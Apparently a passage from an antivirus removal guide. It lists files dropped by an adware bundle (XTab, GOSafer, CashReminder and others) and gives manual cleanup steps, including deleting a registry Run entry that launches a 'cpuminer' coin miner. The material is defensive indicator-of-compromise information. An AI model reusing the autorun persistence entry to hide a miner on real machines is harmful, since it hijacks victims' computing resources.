%Program Files% (x86)\XTab\web\_locales\vi-VI\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\_locales\ru\messages.json (4 bytes)
%Program Files% (x86)\XTab\skin\close.png (3 bytes)
%Program Files% (x86)\XTab\web\data.html (20 bytes)
%Program Files% (x86)\XTab\web\img\logo32.ico (4 bytes)
%Program Files% (x86)\XTab\web\img\icon128.png (9 bytes)
%Program Files% (x86)\XTab\web\js\jquery.autocomplete.js (12 bytes)
%Program Files% (x86)\XTab\skin\about.png (4 bytes)
%Program Files% (x86)\XTab\BrowerWatchCH.dll (23 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-FR\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\img\icon16.png (628 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\settings.png (5 bytes)
%Program Files% (x86)\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-LU\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\js\ga.js (1568 bytes)
%Program Files% (x86)\XTab\web\js\common.js (2 bytes)
%Program Files% (x86)\XTab\web\_locales\tr-TR\messages.json (4 bytes)
%Program Files% (x86)\XTab\SupTab.dll (15928 bytes)
%Program Files% (x86)\XTab\IeWatchDog.dll (20 bytes)
%Program Files% (x86)\XTab\web\_locales\pt-BR\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\img\google_trends.png (7 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-TW\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\rigth_arrow.png (2 bytes)
%Program Files% (x86)\XTab\skin\radio_1.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\close.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tCE1709AA862C234DD936mp.tmp (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bg.png (5064 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\Thumbs.db (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\conf (79 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\scrollbar.bmp (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\2[1].zip (213534 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\479.json (512 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\one.zip (29636 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\535559167_198339_B48A115F[1].htm (72 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\two.zip (74342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\1[1].zip (178958 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\MessageBox.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\535559167_198339_B48A115F[1].htm (72 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\Thumbs.db (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\UninstallManager.exe (60186 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\DataBase (26688 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\uninstallDlg2.xml (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowser.exe (5199 bytes)
%Program Files% (x86)\GOSafer\gosafer.exe (15982 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\GOSafer\ssleay32.dll (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\GOSafer\nfapi.dll (4992 bytes)
%Program Files% (x86)\GOSafer\nfregdrv.exe (1601 bytes)
%Program Files% (x86)\GOSafer\gosaferdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\System.dll (23 bytes)
C:\Windows\System32\drivers\gosaferdrv.sys (51 bytes)
%Program Files% (x86)\GOSafer\uninst.exe (1793 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssF4BB.tmp (67374 bytes)
%Program Files% (x86)\GOSafer\ProtocolFilters.dll (9320 bytes)
%Program Files% (x86)\GOSafer\libeay32.dll (35507 bytes)
%Program Files% (x86)\CashReminder\nfapi.dll (118 bytes)
%Program Files% (x86)\CashReminder\ProtocolFilters.dll (249 bytes)
C:\Windows\Temp\P_StoreList.txt (784 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[2].txt (265 bytes)
C:\Windows\Temp\CashReminder\mfs162E.tmp (3516 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\stores[1].htm (784 bytes)
C:\Windows\Temp\CashReminder\mfs310F.tmp (229227 bytes)
%Program Files% (x86)\CashReminder\libeay32.dll (35507 bytes)
C:\Windows\System32\drivers\crfilterdrv.sys (51 bytes)
%Program Files% (x86)\CashReminder\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscDFF3.tmp (66830 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\CashReminder\CashReminder.exe (15982 bytes)
%Program Files% (x86)\CashReminder\uninstall.exe (1568 bytes)
%Program Files% (x86)\CashReminder\ssleay32.dll (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\CashReminder\crfilterdrv.sys (1856 bytes)
C:\Windows\Temp\ActSys\SSL\NJax Intermediate.cer (774 bytes)
C:\Windows\Temp\ActSys\SSL\cert.db (2 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[4].txt (197 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\cert8.db (7444 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\key3.db (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\UserInfo.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\NSISEncrypt.dll (3323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\nsJSON.dll (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\lm (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\WmiInspector.dll (3137 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\IpConfig.dll (4254 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\tlg (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\mj (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\nsExec.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amipixel.cfg (107 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\index[1].htm (1199 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe:typelib (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amitest.txt (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\amipb[1].js (21314 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[3].txt (16 bytes)
C:\Windows\Temp\G_RuleList.txt (16 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[1].txt (111 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\button-bg.png (131 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\ProgressBar.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\logo_new[1].png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close_Hover.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\bootstrap_42881.html (156 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\button.css (417 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\declineBG[1].png (461 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Loader.gif (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Yes_Button[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ICReinstall_310714_is.exe (1380 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg2.png (978 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\No_Button_Hover[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\Rerarapepe_b[1].png (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Yes_Button_Hover[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe[1].png (922 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp.CIS.part (612 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\icc.dll (212 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\progress-bar.css (506 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\ironsrc_prot[1].png (364 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B3B.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\csshover3.htc (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe3[1].jpg (800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button.png (1 bytes)
%Program Files% (x86)\is383871.log (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D99C.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\sqlite3.dll (643 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\sponsored.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\ie6_main.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button_Hover.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\15094FED_stp.EXE.part (381 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D92E.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\RerarapepeV2_BG4[1].jpg (2178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\form.bmp.Mask (244 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\ES.locale (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\isf_383810.flat (751 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\browse.css (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005ED98.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E32D.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DDEF.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\PT.locale (4 bytes)
C:\Users\"%CurrentUserName%"\Desktop\Continue DESPROTETOR DE LINKS Installation.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\000640C7.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\No_Button[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Progress.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\BG.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E2C0.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DD92.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\logo[1].png (200 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Gometem[1].png (922 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\checkbox.css (190 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\main.css (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B5A.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Sihehihi_31_03_15[1].png (307 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\EN.locale (3 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cpuminer" = "C:\Windows\system32\cpuminer-gw64.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.